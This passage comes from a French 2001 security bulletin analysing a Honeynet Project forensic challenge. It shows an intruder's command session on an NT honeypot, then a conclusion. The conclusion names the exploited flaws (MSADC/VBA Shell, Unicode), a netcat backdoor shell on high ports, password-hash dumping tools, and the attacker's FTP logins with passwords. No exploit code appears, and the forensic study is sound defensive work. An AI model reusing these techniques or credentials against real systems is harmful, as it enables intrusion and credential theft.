C:\TEMP>expl 



C:\TEMP>exit 


Cette transcription correspond à l'incident N°2. Le lecteur notera un style différent et notamment l'utilisation du 

caractère '/' en lieu et place du '\' prouvant une habitude UNIX. Notons que l'analyse réseau ne permettait pas de 

distinguer le style de l'attaquant, celui-ci étant 'noyé' dans les informations environnantes. Toute la difficulté consiste 

désormais à lever le doute: s'agirait-il d'un même indivu utilisant deux accès distants ? 

C:\Program Files\Common Files\system\msadc>cd .. 




Directory of C:\Program Files\Common Files\System 

12/07/00 03:23p . 

12/07/00 03:23p .. 

12/07/00 03:34p ado 

02/04/01 07:04a msadc 

12/07/00 03:34p ole db 

11/11/97 12:50p 399,120 wab32.dll 


1,690,259,968 bytes free 

C:\Program Files\Common Files\System>D: 


C:\Program Files\Common Files\System>cd .. 

C:\Program Files\Common Files>cd .. 





12/21/00 08:59p . 

12/21/00 08:59p .. 




Avril 2001 

12/21/00 08:59p D4 



12/07/00 03:34p Mts 


11/26/00 06:42p Plus! 

12/16/00 06:54p Syslogd 

11/26/00 06:56p Windows NT 


1,690,259,968 bytes free 

C:\Program Files>cd Outlook Express 

C:\Program Files\Outlook Express>dir 



Directory of C:\Program Files\Outlook Express 

12/07/00 03:23p . 

12/07/00 03:23p .. 

11/11/97 10:25a 36,176 msimn.exe 

10/30/97 10:19p 14,182 msimn.txt 

11/11/97 10:25a 97,424 msimnimp.dll 

11/11/97 12:50p 1,689,872 msimnui.dll 

11/11/97 10:25a 26,144 wab.exe 

11/11/97 10:25a 12,464 wabfind.dll 

11/11/97 10:25a 106,752 wabimp.dll 

11/11/97 10:25a 40,224 wabmig.exe 

11/11/97 10:25a 48,624 _isetup.exe 

11 File(s) 2,071,862 bytes 

1,690,259,968 bytes free 

C:\Program Files\Outlook Express>cd ../../ 


C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

02/04/01 07:07a 5,327 har.txt 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 



12/21/00 08:59p TEMP 

02/04/01 07:14a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

15 File(s) 78,648,918 bytes 

1,690,259,968 bytes free 

C:\>type yay.txt 

C:\>mkdir test 

C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

02/04/01 07:07a 5,327 har.txt 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 



12/21/00 08:59p TEMP 

02/04/01 07:22a test 

02/04/01 07:14a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

16 File(s) 78,648,918 bytes 

1,690,259,968 bytes free 

C:\>type har.txt 

(Contenu de har.txt en binaire) 






12/26/00 07:36p . 

12/26/00 07:36p .. 

12/26/00 07:36p microsoft 

12/26/00 07:35p newfiles 

12/26/00 07:24p unix 


1,690,259,968 bytes free 






12/26/00 07:24p . 

12/26/00 07:24p .. 



12/26/00 07:24p trojans 





1,690,259,968 bytes free 

C:\exploits\unix>cd sunos-exploits 

C:\exploits\unix\sunos-exploits>dir 



Directory of C:\exploits\unix\sunos-exploits 

12/26/00 07:25p . 

12/26/00 07:25p .. 

03/23/98 10:25a 3,209 binmail.sh 

03/23/98 10:25a 4,343 chup.c 

03/23/98 10:25a 964 kcms.sh 

03/23/98 10:25a 1,522 lastlog.c 

03/23/98 10:25a 4,988 nittie.c 

03/23/98 10:25a 4,622 passwdscript.sh 


1,690,259,968 bytes free 

C:\exploits\unix\sunos-exploits>cd .. 



C:\>echo best honeypot i've seen till now :)>rfp.txt 

C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

02/04/01 07:07a 5,327 har.txt 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 



02/04/01 07:23a 38 rfp.txt 

12/21/00 08:59p TEMP 

02/04/01 07:22a test 

02/04/01 07:15a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

17 File(s) 78,648,956 bytes 

1,690,259,968 bytes free 



C:\>cd wiretrip 

C:\wiretrip>dir 



Directory of C:\wiretrip 

12/26/00 07:09p . 

12/26/00 07:09p .. 

12/26/00 07:04p 15,501 msadc1.pl 

12/26/00 07:04p 17,865 msadc2.pl 

12/26/00 07:04p 4,425 RFParalyze.c 

12/26/00 07:04p 2,269 RFPickaxe.pl 

12/26/00 07:05p 7,393 RFPoison.c 

12/26/00 07:04p 12,450 RFPoison.zip 

12/26/00 07:04p 1,792 RFProwl.c 

12/26/00 07:06p 170,372 whisker.tar.gz 

12/26/00 07:06p 173,427 whisker.zip 

12/26/00 07:05p 25,229 hiskerids.html 


1,690,259,968 bytes free 

C:\wiretrip>cd .. 

C:\>dir 






Avril 2001 

11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

02/04/01 07:07a 5,327 har.txt 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 



02/04/01 07:23a 38 rfp.txt 

12/21/00 08:59p TEMP 

02/04/01 07:22a test 

02/04/01 07:15a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

17 File(s) 78,648,956 bytes 

1,690,259,968 bytes free 






12/26/00 07:36p . 

12/26/00 07:36p .. 

12/26/00 07:36p microsoft 

12/26/00 07:35p newfiles 

12/26/00 07:24p unix 


1,690,259,968 bytes free 

C:\exploits>cd newfiles 

C:\exploits\newfiles>dir 



Directory of C:\exploits\newfiles 

12/26/00 07:35p . 

12/26/00 07:35p .. 


1,690,259,968 bytes free 

C:\exploits\newfiles> 

C:\exploits\newfiles>cd ../unix 






12/26/00 07:24p . 

12/26/00 07:24p .. 



12/26/00 07:24p trojans 





1,690,259,968 bytes free 

C:\exploits\unix>cd tcp-exploits 

C:\exploits\unix\tcp-exploits>dir 



Directory of C:\exploits\unix\tcp-exploits 

12/26/00 07:24p . 

12/26/00 07:24p .. 

03/23/98 10:26a 1,330 ALLHOSTS.C 

03/23/98 10:26a 7,436 bounce.c 

03/23/98 10:26a 4,841 CSIRCSEQ.C 

03/23/98 10:26a 4,465 datapipe.c 

03/23/98 10:26a 3,782 KILL-ME.C 

03/23/98 10:26a 8,548 NNTPFORG.C 

03/23/98 10:26a 9,372 SZ-SEQ.C 

03/23/98 10:26a 5,924 TSPOOF.C 


1,690,259,968 bytes free 

C:\exploits\unix\tcp-exploits>type ALLHOSTS.C 


C:\exploits\unix\tcp-exploits>dir 

(Résultats identiques 

C:\exploits\unix\tcp-exploits>type CSIRCSEQ.C 


C:\exploits\unix\tcp-exploits>C: 

C:\exploits\unix\tcp-exploits>cd .. 



C:\>cd .. 

C:\>D: 


C:\>A: 


C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

02/04/01 07:07a 5,327 har.txt 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 



02/04/01 07:23a 38 rfp.txt 

12/21/00 08:59p TEMP 

02/04/01 07:22a test 

02/04/01 07:15a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

17 File(s)78,648,956 bytes 

1,690,259,968 bytes free 

C:\>type README.NOW.Hax0r 

Hi, i know that this a is a lab server, but patch the 

holes! :-) 

C:\>cd Program Files 





12/21/00 08:59p . 

12/21/00 08:59p .. 


12/21/00 08:59p D4 



12/07/00 03:34p Mts 


11/26/00 06:42p Plus! 

12/16/00 06:54p Syslogd 

11/26/00 06:56p Windows NT 


1,690,259,968 bytes free 


C:\>cd Inetpub 





12/07/00 03:30p . 

12/07/00 03:30p .. 

11/26/00 12:40p ftproot 

11/26/00 12:40p gophroot 


11/26/00 12:40p scripts 

02/04/01 07:15a wwwroot 


1,690,259,968 bytes free 






02/04/01 07:15a . 

02/04/01 07:15a .. 

12/07/00 03:37p cgi-bin 

12/07/00 03:37p 4,663 default.asp 

12/15/00 10:26p 1,233 default.htm 


12/15/00 09:15p guest 

12/07/00 03:37p images 

12/15/00 06:36p 709 lrfpbot.gif 

12/15/00 07:05p 673 lrfptop.gif 

12/15/00 06:36p 1,422 nmrc.gif 


12/15/00 06:36p 968 rfp.gif 

12/15/00 06:36p 8,606 rfpback.gif 

12/15/00 06:36p 8,606 rfpback1.gif 

11/26/00 12:40p samples 

12/15/00 06:36p 1,624 sf.gif 




Avril 2001 

12/15/00 06:36p 2,526 void.gif 

12/15/00 06:36p 1,213 whisker.gif 

12/15/00 06:36p 1,161 win2k.gif 

12/07/00 03:37p _private 

12/07/00 03:37p 1,759 _vti_inf.html 


1,690,259,968 bytes free 

C:\InetPub\wwwroot>echo test > test.txt 

C:\InetPub\wwwroot>echo this can't be true > test.txt 

C:\InetPub\wwwroot>type test.txt 

this can't be true 





02/04/01 07:33a . 

02/04/01 07:33a .. 

12/07/00 03:37p cgi-bin 

12/07/00 03:37p 4,663 default.asp 

12/15/00 10:26p 1,233 default.htm 


12/15/00 09:15p guest 

12/07/00 03:37p images 

12/15/00 06:36p 709 lrfpbot.gif 

12/15/00 07:05p 673 lrfptop.gif 

12/15/00 06:36p 1,422 nmrc.gif 


12/15/00 06:36p 968 rfp.gif 

12/15/00 06:36p 8,606 rfpback.gif 

12/15/00 06:36p 8,606 rfpback1.gif 

11/26/00 12:40p samples 

12/15/00 06:36p 1,624 sf.gif 


02/04/01 07:34a 21 test.txt 

12/15/00 06:36p 2,526 void.gif 

12/15/00 06:36p 1,213 whisker.gif 

12/15/00 06:36p 1,161 win2k.gif 

12/07/00 03:37p _private 

12/07/00 03:37p 1,759 _vti_inf.html 


1,690,259,968 bytes free 

C:\InetPub\wwwroot>w 


internal or external command, operable program or batch 

file. 

C:\InetPub\wwwroot>cd .. 





12/07/00 03:30p . 

12/07/00 03:30p .. 

11/26/00 12:40p ftproot 

11/26/00 12:40p gophroot 


11/26/00 12:40p scripts 

02/04/01 07:33a wwwroot 


1,690,259,968 bytes free 

C:\InetPub>cd .. 

C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

02/04/01 07:07a 5,327 har.txt 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 



02/04/01 07:23a 38 rfp.txt 

12/21/00 08:59p TEMP 

02/04/01 07:22a test 

02/04/01 07:34a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

17 File(s) 78,648,956 bytes 

1,690,259,968 bytes free 

C:\>crmdir test 



C:\>rmdir test 

C:\>cd inetpub/wwwroot 





12/07/00 03:30p . 

12/07/00 03:30p .. 

11/26/00 12:40p ftproot 

11/26/00 12:40p gophroot 


11/26/00 12:40p scripts 

02/04/01 07:33a wwwroot 


1,690,259,968 bytes free 






02/04/01 07:33a . 

02/04/01 07:33a .. 

12/07/00 03:37p cgi-bin 

12/07/00 03:37p 4,663 default.asp 

12/15/00 10:26p 1,233 default.htm 


12/15/00 09:15p guest 

12/07/00 03:37p images 

12/15/00 06:36p 709 lrfpbot.gif 

12/15/00 07:05p 673 lrfptop.gif 

12/15/00 06:36p 1,422 nmrc.gif 


12/15/00 06:36p 968 rfp.gif 

12/15/00 06:36p 8,606 rfpback.gif 

12/15/00 06:36p 8,606 rfpback1.gif 

11/26/00 12:40p samples 

12/15/00 06:36p 1,624 sf.gif 


02/04/01 07:34a 21 test.txt 

12/15/00 06:36p 2,526 void.gif 

12/15/00 06:36p 1,213 whisker.gif 

12/15/00 06:36p 1,161 win2k.gif 

12/07/00 03:37p _private 

12/07/00 03:37p 1,759 _vti_inf.html 


1,690,259,968 bytes free 

C:\InetPub\wwwroot>copy default.htm default.html 

1 file(s) copied. 

C:\InetPub\wwwroot>echo . >>default.htm 

C:\InetPub\wwwroot>cd .. 

C:\InetPub>cd .. 

C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

02/04/01 07:07a 5,327 har.txt 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 



02/04/01 07:23a 38 rfp.txt 

12/21/00 08:59p TEMP 

02/04/01 07:34a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

16 File(s) 78,648,956 bytes 

1,690,258,432 bytes free 

C:\>exit 



Avril 2001 

Conclusion 

1. Deux vagues d'attaques peuvent être identifiées dont tout laisse à penser qu'elles sont le fait de deux 

individus distincts, le second exploitant involontairement un accès laissé ouvert par le premier ! En effet, l'étude 

des deux sessions montre un changement des caractéristiques, de la signature pourrait-on dire, de l'attaque. De 

plus, l'auteur de la seconde attaque semble complétement ignorer l'origine et le contenu des fichiers déposés 

durant l'attaque précédente. Les messages laissés sur le système vont d'ailleurs dans ce sens. 

L'auteur de la première attaque ne remarque rien et signe son exploit, alors que son 'successeur' annonce avoir 

découvert le 'pot aux roses'. A ce propos, aucun élement ne semble permettre de conclure quant à la présence 

d'un système piégé … sauf la présence des fichiers résultants de la première attaque et l'existence d'une porte 

dérobée. Le second attaquant en aurait-il conclu qu'il s'agissait là d'un piège, car trop évident ? 

Notons que les auteurs du défi précisent: We have reason to believe that the attacker knew this was a honeypot, 

however we decided to release this challenge as it examplifies the most common of NT attacks found in the wild 

laissant entendre que l'attaque n'est le fait que d'un unique individu … 

2. Deux vulnérabilités sont exploitées successivement pour ouvrir un accès dérobé sur le système 

3. 

attaqué: 'VBA Shell' [Paquets 0037-0991] puis 'UNICODE' [Paquets 0992-5769] 

Les actions sont enchaînées via un script édité au fil de l'eau, les résultats étant supervisées en temps 

réel, comme le montrent les innombrables erreurs commises. 

4. Le premier attaquant dispose de comptes 'ftp' sur trois sites Internet 

- johna2k/hacker2000 sur www.nether.net [Paquets 0308-323] 

- johna2k/haxedj00 sur 1Cust162.tnt13.stk3.da.uu.net (213.116.251.162) [Paquets 0528-530] 

- johna2k/hacker2000 sur freedu-12-26.libertysurf.se (212.139.12.26) [Paquets 0528- … ] 

L'analyse du nom '1Cust162.tnt13.stk3.da.uu.net' révèle qu'il s'agit d'un point d'accès (da: Dial Access) 

UUNET probablement localisé sur Stockholm (stk: StockHolm). Cette localisation est corroborée par l'existence 

d'un second site lui aussi localisé en Suède: freedu-12-26.libertysurf.se. En pratique, l'adresse utilisée est 

dynamique, et seule une collaboration avec UUNET et LIBERTYSURF permettra de remonter à l'identité du 

propriétaire du système. La bannière d'en-tête du service ftp n'apporte pas grande information. 

220-Serv-U FTP-Server v2.5h for WinSock ready... 

220--------H-A-C-K T-H-E P-L-A-N-E-T-------- 

220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r. 

220-Featuring 100% elite hax0r warez!@$#@ 

(welcome to johnA's oday ftp server) 

220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram. 

220 -------H-A-C-K T-H-E P-L-A-N-E-T-------- 

5. Ces comptes 'ftp' sont utilisés comme support de stockage de différents utilitaires: 

- Netcat (ou nc.exe) utilisé comme service d'accès un interpréteur de commande sur les ports TCP/6868 [Paquet 

4234], TCP/6968 [Paquets 3743,4224], TCP/6969 [Paquets 1234,3662,5458] 

- Pdump dont on supposer qu'il s'agit d'une adaptation de l'utilitaire pwdump permettant d'acquérir les mots de 

passe du système 

- SamDump.dll dont le nom laisse entendre qu'il s'agit d'une librairie dynamique destinée à copier le contenu de 

l'annuaire de sécurité SAM, 

Le défi N°14 démontre non seulement la difficulté rencontrée pour suivre une seule attaque dans un environnement 

pourtant peu bruité (3 à 4 connexions licites et peu actives durant l'attaque) mais surtout la complexité de la 

détermination des liens de cause à effet en cas de pluralité des sources. Il prouve la nécessité de pouvoir disposer 

d'une information 'native' dans un format normalisée et susceptible d'être traitée selon différents critères d'analyse. 


Http://project.honeynet.org/scans/scan14/ 

Http://www.silicondefense.com/software/snortsnarf/

Veille Technologique Sécurité - cert devoteam

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?